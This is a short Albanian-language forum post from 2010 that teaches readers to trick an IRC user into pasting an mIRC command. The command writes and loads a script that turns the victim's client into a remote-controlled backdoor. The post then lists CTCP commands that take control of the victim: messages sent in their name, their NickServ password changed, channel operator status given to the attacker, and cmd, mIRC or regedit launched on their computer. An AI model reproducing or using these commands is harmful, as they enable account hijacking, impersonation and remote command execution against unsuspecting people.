beni torture ne IRC

Go down

beni torture ne IRC

Post  Admin on Sat Jan 09, 2010 8:50 am

//write neo.pas ctcp 1:*$1- | Load -rs neo.pas kete Komanden jipjani tjetrit po mos e provoni vet ta shkruj ai ne Server dhe ai person qe e shkrun kete Komand eshte ne kontrolin tuaj.

a)Per ta futur Viktimen ne nje Kanal : /ctcp nick /j #kanal

b)Per ta rrexuar nga Floodet : /ctcp NICK /timer1 0 0 /ping $me

c)Per te Derguar mesazh ne Kanal me emrin e Viktimes : /ctcp nick /msg #kanal mesazhi

d)Per te derguar mesazh privat me emrin e Viktimes : /ctcp nick /msg nick(shkrimi qe do shkruni) mesazh

e)Per ta hequr nga KanaLi Viktimen : /ctcp nick /part #kanal

f)Per tja mbyllur programin e Chatit : /ctcp nick /exit

g)Per tja Nderruar Passwordin e Nickut : /ctcp nick /msg nickserv set passwd passiri

h)per tia Ndrruar Nickun : /ctcp NICK /nick Nickuri

i)Per tu bere Op ne KanaLin qe ka access Viktima: /ctcp NICK /mode #kanal +o NickuJuaj

j)Per tja Futur ne Pune Viktimes msdos'in : /ctcp nick /run command

k)Per tja Hapur viktimes nje mIRc tjeter : /ctcp Nick /run mirc

l)Per tja hapur Regedit'in Viktimes : /ctcp NICK /run rege


Shpresoj te kem qeen i qarte
Gjith te mirat

Admin
Admin

Posts : 149
Join date : 2010-01-05

View user profile http://al-capone.forumotion.com

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum